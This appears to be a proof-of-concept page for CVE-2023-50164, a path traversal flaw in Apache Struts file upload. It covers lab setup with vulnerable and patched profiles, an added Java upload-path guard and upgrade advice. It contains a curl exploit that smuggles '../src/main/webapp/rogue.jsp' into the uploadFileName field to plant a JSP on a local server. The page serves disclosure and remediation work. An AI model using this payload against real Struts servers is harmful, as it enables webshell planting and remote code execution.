POC details: fe247bb033d6463f5a5567e1d6113b732df52e30

Source
Related vulnerability
Title: Apache Struts security vulnerability (CVE-2023-50164)
Description: Apache Struts is an open-source project of the Apache Foundation (USA). It is an open-source MVC framework for building enterprise-grade Java web applications, offered mainly as two framework product lines, Struts 1 and Struts 2. Apache Struts has a security vulnerability that stems from a path traversal flaw in the file upload parameter. An attacker can exploit it to upload malicious files and execute remote code. Affected products and versions: Apache Struts 2.0.0 through 2.5.32 and 6.0.0 through 6.3.0.1.
Introduction
This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), which describes a
new path traversal vulnerability that can lead to Remote Code Execution (RCE) in
[struts-core](https://struts.apache.org/).

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC

There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.

To run _with the RCE vuln_, execute the following:

```
mvn clean jetty:run -P vuln
```

To run _without the RCE vuln_, execute the following:

```
mvn clean jetty:run -P no-vuln
```

The difference between the two profiles is that `vuln` uses `struts-core` version `6.3.0.1`
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2`
(which does not have the path traversal vulnerability).

## Exploit the Vuln

While running the `vuln` profile described above, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is a code fix solution that works with the older Struts versions, _but_, it is still highly advised to update
your version of Struts.

To exercise the code fix, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln`
endpoint, even if you use a relative path like `../src/main/webapp/rogue.jsp`, as the new version of Struts
automatically strips away relative path references.
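As an added example (this is not the repository's own `UploadNoVuln.java`, whose contents the page does not reproduce), a self-contained Java guard that rejects a client-supplied `uploadFileName` which would escape the upload directory, the way the `/upload-no-vuln` endpoint above refuses `../src/main/webapp/rogue.jsp`. The class name, method name and the `uploads` directory are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not code from this repository. Validates an attacker-controlled
// upload file name before it is used to build a path on disk.
public final class UploadPathGuard {

    private final Path uploadRoot;

    public UploadPathGuard(String uploadDir) {
        // Canonical absolute base directory to compare every target against.
        this.uploadRoot = Paths.get(uploadDir).toAbsolutePath().normalize();
    }

    /** Returns the resolved target path, or throws if the name is unsafe. */
    public Path resolveSafely(String uploadFileName) {
        if (uploadFileName == null || uploadFileName.isEmpty()) {
            throw new IllegalArgumentException("Missing file name");
        }
        // A client-supplied file name must not carry any directory component,
        // whichever separator style it uses, and must not contain a NUL byte.
        String baseName = uploadFileName.replace('\\', '/');
        if (baseName.contains("/") || baseName.contains("\0")) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        Path target = uploadRoot.resolve(baseName).normalize();
        // Defence in depth: after normalization the target must still lie
        // strictly inside the upload root (this also rejects "." and "..").
        if (!target.startsWith(uploadRoot) || target.equals(uploadRoot)) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        return target;
    }

    public static void main(String[] args) {
        UploadPathGuard guard = new UploadPathGuard("uploads");
        // Constructed sample names: one benign, three traversal attempts.
        String[] samples = {"report.pdf", "../src/main/webapp/rogue.jsp",
                            "..\\WEB-INF\\web.xml", ".."};
        for (String name : samples) {
            try {
                System.out.println("OK   " + name + " -> " + guard.resolveSafely(name));
            } catch (IllegalArgumentException e) {
                System.out.println("DENY " + name + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Only `report.pdf` is accepted; the other three names are rejected before any file is written.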
File snapshot

```
[4.0K] /data/pocs/fe247bb033d6463f5a5567e1d6113b732df52e30
├── [ 11K] LICENSE
├── [ 10K] mvnw
├── [6.8K] mvnw.cmd
├── [4.0K] payload
│   └── [ 173] rogue.jsp
├── [4.0K] pom.xml
├── [2.1K] README.md
├── [4.0K] src
│   └── [4.0K] main
│       ├── [4.0K] java
│       │   └── [4.0K] io
│       │       └── [4.0K] snyk
│       │           └── [4.0K] labs
│       │               └── [4.0K] actions
│       │                   ├── [1.8K] Upload.java
│       │                   └── [2.5K] UploadNoVuln.java
│       ├── [4.0K] resources
│       │   └── [1.2K] struts.xml
│       └── [4.0K] webapp
│           ├── [ 190] index.html
│           └── [4.0K] WEB-INF
│               ├── [ 579] error.jsp
│               ├── [ 600] success.jsp
│               ├── [ 570] upload.jsp
│               └── [ 780] web.xml
└── [4.0K] uploads

12 directories, 14 files
```